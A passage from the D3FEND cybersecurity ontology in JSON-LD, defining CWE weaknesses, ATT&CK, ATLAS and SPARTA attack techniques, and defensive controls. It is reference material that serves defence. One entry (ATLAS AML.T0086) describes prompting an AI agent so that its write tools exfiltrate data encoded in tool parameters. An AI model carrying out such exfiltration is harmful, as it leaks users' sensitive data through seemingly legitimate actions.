      "d3f:cwe-id": "CWE-1024",
      "d3f:definition": "The product performs a comparison between two entities, but the entities are of different, incompatible types that cannot be guaranteed to provide correct results when they are directly compared.",
      "rdfs:label": "Comparison of Incompatible Types",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:CWE-210",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-210",
      "d3f:definition": "The product identifies an error condition and creates its own diagnostic or error messages that contain sensitive information.",
      "rdfs:label": "Self-generated Error Message Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-209"
      }
    },
    {
      "@id": "d3f:T1558.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1558.002",
      "d3f:definition": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)",
      "rdfs:label": "Silver Ticket",
      "rdfs:subClassOf": {
        "@id": "d3f:T1558"
      }
    },
    {
      "@id": "d3f:CWE-48",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-48",
      "d3f:definition": "The product accepts path input in the form of internal space ('file(SPACE)name') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'file name' (Internal Whitespace)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:AML.T0086",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0086",
      "d3f:definition": "Adversaries may use prompts to invoke an agent's tool capable of performing write operations to exfiltrate data. Sensitive information can be encoded into the tool's input parameters and transmitted as part of a seemingly legitimate action. Variants include sending emails, creating or modifying documents, updating CRM records, or even generating media such as images or videos.",
      "rdfs:label": "Exfiltration via AI Agent Tool Invocation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0086"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "Exfiltration via AI Agent Tool Invocation"
    },
    {
      "@id": "d3f:T1036.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.006",
      "d3f:creates": {
        "@id": "d3f:File"
      },
      "d3f:definition": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.",
      "rdfs:label": "Space after Filename",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:N758ddcda69cb4df0b04f124aba2a015f"
        }
      ]
    },
    {
      "@id": "_:N758ddcda69cb4df0b04f124aba2a015f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Credential",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:UserAccount"
      },
      "d3f:definition": "A credential is a physical/tangible object, a piece of knowledge, or a facet of a person's physical being that enables an individual access to a given physical facility or computer-based information system. Typically, credentials can be something a person knows (such as a number or PIN), something they have (such as an access badge), something they are (such as a biometric feature), something they do (measurable behavioral patterns) or some combination of these items. This is known as multi-factor authentication. The typical credential is an access card or key-fob, and newer software can also turn users' smartphones into access devices.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Access_control#Credential"
      },
      "rdfs:label": "Credential",
      "rdfs:seeAlso": {
        "@id": "dbr:Access_control"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N36f1390cfa74483a8291fc75258783f7"
        }
      ]
    },
    {
      "@id": "_:N36f1390cfa74483a8291fc75258783f7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1027.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1027.001",
      "d3f:definition": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.",
      "d3f:modifies": {
        "@id": "d3f:ExecutableBinary"
      },
      "rdfs:label": "Binary Padding",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1027"
        },
        {
          "@id": "_:Na449a86f629e44f6bf245ec91dd59d46"
        }
      ]
    },
    {
      "@id": "_:Na449a86f629e44f6bf245ec91dd59d46",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:CWE-436",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-436",
      "d3f:definition": "Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state.",
      "rdfs:label": "Interpretation Conflict",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-435"
      }
    },
    {
      "@id": "d3f:EX-0001.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0001.01",
      "d3f:definition": "Threat actors may resend authentic-looking telecommands that were previously accepted by the spacecraft. Captures may include whole command PDUs with framing, CRC/MAC, counters, and timetags intact, or they may be reconstructed from operator tooling and procedure logs. When timing, counters, and mode preconditions align, the replayed packet can cause the same effect: toggling relays, initiating safing or recovery scripts, adjusting tables, commanding momentum dumps, or scheduling delta-v events. Even when outright execution fails, repeated “near-miss” injections can map acceptance windows, rate/size limits, and interlocks by observing the spacecraft’s acknowledgments and state changes. At scale, streams of valid-but-stale commands can congest command queues, delay legitimate activity, or trigger nuisance FDIR responses.",
      "d3f:produces": {
        "@id": "d3f:OTProtocolMessage"
      },
      "rdfs:label": "Command Packets - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0001/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0001"
        },
        {
          "@id": "_:N49436220e1f64c158f30feaa3d923ade"
        }
      ],
      "skos:prefLabel": "Command Packets"
    },
    {
      "@id": "_:N49436220e1f64c158f30feaa3d923ade",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:RegexMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RM",
      "d3f:definition": "Regular expression matching is a type of partial string matching using a regular expression, which is a sequence of characters that specifies a match pattern in text.",
      "d3f:kb-article": "## How it works\n\nA regular expression (shortened as regex or regexp) is a sequence of characters that specifies a match pattern in text. Usually such patterns are used by string-searching algorithms for \"find\" or \"find and replace\" operations on strings, or for input validation.\n\n## Key Test Considerations\n\n- **External review of regular expressions**: Regular expressions used in rules should be reviewed by an independent developer SME.  Regex testing and visualization tools may be used to aid this review.  Back-tests for failure modes identified during the review should be developed.  Regular expressions are easy to get wrong and may appear to work on limited tests; small mistakes can lead to unintended misses and matches.\n\n- **Processing Performance Review**: Review of resource-intensive rules may be necessary if system performance is degraded.  Look for cases of “exponential backtracking”.  Some regexes are computationally expensive.\n\n## References\n1. Regular expression. (2023, June 1). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Regular_expression).\n2. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm).",
      "d3f:synonym": [
        "Regex",
        "Regexp"
      ],
      "rdfs:label": "Regex Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PartialMatching"
      }
    },
    {
      "@id": "d3f:T1584.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.002",
      "d3f:definition": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.",
      "rdfs:label": "DNS Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        }
      ],
      "d3f:control-name": "Malicious Code Protection",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SI-3"
    },
    {
      "@id": "d3f:CWE-768",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-768",
      "d3f:definition": "The product contains a conditional statement with multiple logical expressions in which one of the non-leading expressions may produce side effects. This may lead to an unexpected state in the program after the execution of the conditional, because short-circuiting logic may prevent the side effects from occurring.",
      "rdfs:label": "Incorrect Short Circuit Evaluation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:ApplicationStartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an application transitions from an inactive state to an active state, initializing its resources and becoming operational for user interaction or automated processes.",
      "rdfs:label": "Application Start Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N1f17fc98dcb64756b38f7506d12c6e31"
        }
      ]
    },
    {
      "@id": "_:N1f17fc98dcb64756b38f7506d12c6e31",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstallationEvent"
      }
    },
    {
      "@id": "d3f:CWE-620",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-620",
      "d3f:definition": "When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.",
      "rdfs:label": "Unverified Password Change",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:Reference-SecuritySystemWithMethodologyForInterprocessCommunicationControl_CheckPointSoftwareTechInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20040199763"
      },
      "d3f:kb-abstract": "A security system with methodology for interprocess communication control is described. In one embodiment, a method for controlling interprocess communication is provided that includes steps of: defining rules indicating which system services a given application can invoke; trapping an attempt by a particular application to invoke a particular system service; identifying the particular application that is attempting to invoke the particular system service; and based on identity of the particular application and on the rules indicating which system services a given application can invoke, blocking the attempt when the rules indicate that the particular application cannot invoke the particular system service.",
      "d3f:kb-author": "Gregor Freund",
      "d3f:kb-mitre-analysis": "This patent describes a technique for monitoring interprocess communications to prevent malicious applications from requesting system services. API calls are monitored to detect malicious applications attempting to open a communication channel (port) to access system services or sending messages to other applications using user32 API functions. These requests are examined against an external rules engine or whitelist, matches deny or block access and produce an error message such as connection refused or service not available.",
      "d3f:kb-organization": "Check Point Software Tech Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Security System with Methodology for Interprocess Communication Control",
      "rdfs:label": "Reference - Security System with Methodology for Interprocess Communication Control - Check Point Software Tech Inc"
    },
    {
      "@id": "d3f:T1061",
      "@type": "owl:Class",
      "d3f:attack-id": "T1061",
      "d3f:definition": "**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.**",
      "rdfs:label": "Graphical User Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-88",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-88",
      "d3f:definition": "The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.",
      "rdfs:label": "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-77"
      }
    },
    {
      "@id": "d3f:GetSystemConfigValue",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:reads": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Get System Config Value",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regopenkeyexa"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigSystemCall"
        },
        {
          "@id": "_:N3caf1fbe36f64e2ba15a736d56572a8f"
        }
      ]
    },
    {
      "@id": "_:N3caf1fbe36f64e2ba15a736d56572a8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:JavascriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Javascript File"
    },
    {
      "@id": "d3f:VideoInputDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Video input devices are used to digitize images or video from the outside world into the computer. The information can be stored in a multitude of formats depending on the user's requirement.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Input_device#Video_input_devices"
      },
      "rdfs:label": "Video Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "d3f:WindowsNtOpenProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Opens a handle to process object and sets the access rights to this object.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-ntopenprocess"
      },
      "rdfs:label": "Windows NtOpenProcess",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITraceProcess"
      }
    },
    {
      "@id": "d3f:InternetNetwork",
      "@type": "owl:Class",
      "d3f:definition": "A network of multiple, connected networks. Internetworking is the practice of connecting a computer network with other networks through the use of gateways that provide a common method of routing information packets between the networks. The resulting system of interconnected networks are called an internetwork, or simply an internet. Internetworking is a combination of the words inter (\"between\") and networking; not internet-working or international-network.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:label": "Internet Network",
      "rdfs:subClassOf": {
        "@id": "d3f:Network"
      },
      "skos:altLabel": [
        "Interconnected Network",
        "Internet",
        "Internetwork"
      ]
    },
    {
      "@id": "d3f:RAM",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:carries": {
        "@id": "d3f:MemoryExtent"
      },
      "d3f:definition": "Random-access memory (RAM) is a form of computer memory that can be read and changed in any order, typically used to store working data and machine code.",
      "d3f:synonym": "Random-access Memory",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Random-access_memory"
      },
      "rdfs:label": "RAM",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PrimaryStorage"
        },
        {
          "@id": "_:Nacd397129b344eadb00a8b2396a625d6"
        }
      ]
    },
    {
      "@id": "_:Nacd397129b344eadb00a8b2396a625d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:carries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryExtent"
      }
    },
    {
      "@id": "d3f:ForwardResolutionDomainDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ForwardResolutionDomainDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "d3f:d3fend-id": "D3-FRDDL",
      "d3f:definition": "Blocking a lookup based on the query's domain name value.",
      "d3f:kb-article": "## How it works\n\nPolicies are created that filter DNS queries using fully qualified domain name (FQDN) of record in the query. A DNS policy can be created for blocking DNS queries from FQDNs that have been identified as unauthorized.\n\n## Considerations\n\nContinuous maintenance of unauthorized domain lists is needed to keep up to date as updates occur.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "Forward Resolution Domain Blacklisting",
      "rdfs:label": "Forward Resolution Domain Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSDenylisting"
        },
        {
          "@id": "_:N6c34597cd6724c448748268826a60f6f"
        }
      ]
    },
    {
      "@id": "_:N6c34597cd6724c448748268826a60f6f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:CWE-1098",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1098",
      "d3f:definition": "The code contains a data element with a pointer that does not have an associated copy or constructor method.",
      "rdfs:label": "Data Element containing Pointer Item without Proper Copy Control Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:PlatformMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PlatformMonitoring"
      ],
      "d3f:d3fend-id": "D3-PM",
      "d3f:definition": "Monitoring platform components such as operating systems software, hardware devices, or firmware.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "Platform monitoring consists of the analysis and monitoring of system level devices and low-level components, including hardware devices, to detect unauthorized modifications or suspicious activity.\n\nMonitored platform components includes system files and embedded devices such as:\n\n * Kernel software modules\n * Boot process code and load logic\n * Operating system components and device files\n * System libraries and dynamically loaded files\n * Hardware device drivers\n * Embedded firmware devices",
      "rdfs:label": "Platform Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N6f523ce2112848b78a6cece61f373463"
        }
      ]
    },
    {
      "@id": "_:N6f523ce2112848b78a6cece61f373463",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:T1179",
      "@type": "owl:Class",
      "d3f:attack-id": "T1179",
      "d3f:definition": "Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1056.004",
      "rdfs:label": "Hooking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1056.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:DigitalImage",
      "@type": "owl:Class",
      "d3f:definition": "A digital image is a pixel-based visual representation stored in formats like JPEG or PNG, used for various digital applications.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Digital_image",
      "rdfs:label": "Digital Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:OTModifyDeviceOperatingModeCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Modifies the running state of an application or program on a device.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Modify Device Operating Mode Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceConfigurationCommand"
        },
        {
          "@id": "_:N13bacdaaf0ce418fab87ca71b2d759b7"
        }
      ]
    },
    {
      "@id": "_:N13bacdaaf0ce418fab87ca71b2d759b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:Thread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Thread is the smallest unit of execution within a process, representing a sequence of instructions that can be scheduled and executed independently by the operating system.",
      "rdfs:label": "Thread",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:AccessGrantedEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event signifying that access to a resource has been authorized and successfully enforced, allowing the requesting agent to perform specified operations based on the access control policies.",
      "rdfs:label": "Access Granted Event",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessMediationEvent"
      }
    },
    {
      "@id": "d3f:T1417.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1417.001",
      "d3f:definition": "Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.",
      "rdfs:label": "Keylogging - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1417"
      },
      "skos:prefLabel": "Keylogging"
    },
    {
      "@id": "d3f:ApplicationStopEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the cessation of an application’s operations, transitioning it to an inactive state and releasing any allocated resources.",
      "rdfs:label": "Application Stop Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:Nf4ef39cb228a418e9ba4647912aa20e4"
        }
      ]
    },
    {
      "@id": "_:Nf4ef39cb228a418e9ba4647912aa20e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationStartEvent"
      }
    },
    {
      "@id": "d3f:DS0021",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Persona (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1636",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application’s manifest. On iOS, they must be included in the application’s `Info.plist` file.",
      "rdfs:label": "Protected User Data - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Protected User Data"
    },
    {
      "@id": "d3f:CWE-89",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-89",
      "d3f:definition": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.",
      "d3f:synonym": [
        "SQL injection",
        "SQLi"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-943"
        },
        {
          "@id": "_:N8c620ef9862d47b1b895acc83ce6c96e"
        }
      ]
    },
    {
      "@id": "_:N8c620ef9862d47b1b895acc83ce6c96e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:CWE-476",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-476",
      "d3f:definition": "The product dereferences a pointer that it expects to be valid but is NULL.",
      "d3f:synonym": [
        "NPD",
        "NPE",
        "nil pointer dereference",
        "null deref"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:PointerDereferencingFunction"
      },
      "rdfs:label": "NULL Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-710"
        },
        {
          "@id": "d3f:CWE-754"
        },
        {
          "@id": "_:N2212930d7ca24e39952027bf31e0623a"
        }
      ]
    },
    {
      "@id": "_:N2212930d7ca24e39952027bf31e0623a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:ATTACKThing",
      "@type": "owl:Class",
      "d3f:definition": "ATTACK things are concepts defined in the ATT&CK Framework.",
      "rdfs:label": "ATTACK Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThreatModelThing"
      }
    },
    {
      "@id": "d3f:CWE-201",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-201",
      "d3f:definition": "The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor.",
      "rdfs:label": "Insertion of Sensitive Information Into Sent Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:T1517",
      "@type": "owl:Class",
      "d3f:attack-id": "T1517",
      "d3f:definition": "Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass)",
      "rdfs:label": "Access Notifications - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Access Notifications"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Flow Control of Encrypted Information",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(4)"
    },
    {
      "@id": "d3f:CWE-496",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-496",
      "d3f:definition": "Assigning public data to a private array is equivalent to giving public access to the array.",
      "rdfs:label": "Public Data Assigned to Private Array-Typed Field",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:T0850",
      "@type": "owl:Class",
      "d3f:attack-id": "T0850",
      "d3f:definition": "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Role Identification - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Role Identification"
    },
    {
      "@id": "d3f:CCI-000017_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically disables inactive accounts after an organization-defined time period.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000017"
    },
    {
      "@id": "d3f:OutboundTrafficFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OutboundTrafficFiltering"
      ],
      "d3f:d3fend-id": "D3-OTF",
      "d3f:definition": "Restricting network traffic originating from a private host or enclave destined towards untrusted networks.",
      "d3f:filters": {
        "@id": "d3f:OutboundNetworkTraffic"
      },
      "d3f:kb-article": "## How it works\n\nOutbound traffic, in this context, is network traffic originating from a private host or enclave destined towards untrusted networks.\nFor example:\n\n* An enterprise desktop intranet user connecting to www.example.com\n* An internal mail server connecting to an external mail server, mail.example.com\n\nFiltering is commonly implemented as firewall rulesets to limit outbound traffic permitted to egress a host or network. Firewalls are deployed either directly on hosts through kernel level software implementations or installed in-line directly on network links. There are benefits and disadvantages to each approach.\n\nThere are various strategies for developing filtering rulesets:\n\n* Block everything by default\n* Limit destination hosts\n* Limit destination transport or application protocols\n* Restrict content outbound (Ex. strings formatted as social security numbers, or proprietary data)\n\n## Considerations\n* Dynamic IP assignment creates challenges for Outbound Traffic Filtering because users are not necessarily associated with the same IP address. This can be addressed by linking IP address management information with the filtering logic.\n* Connections using non-standard transport layer ports 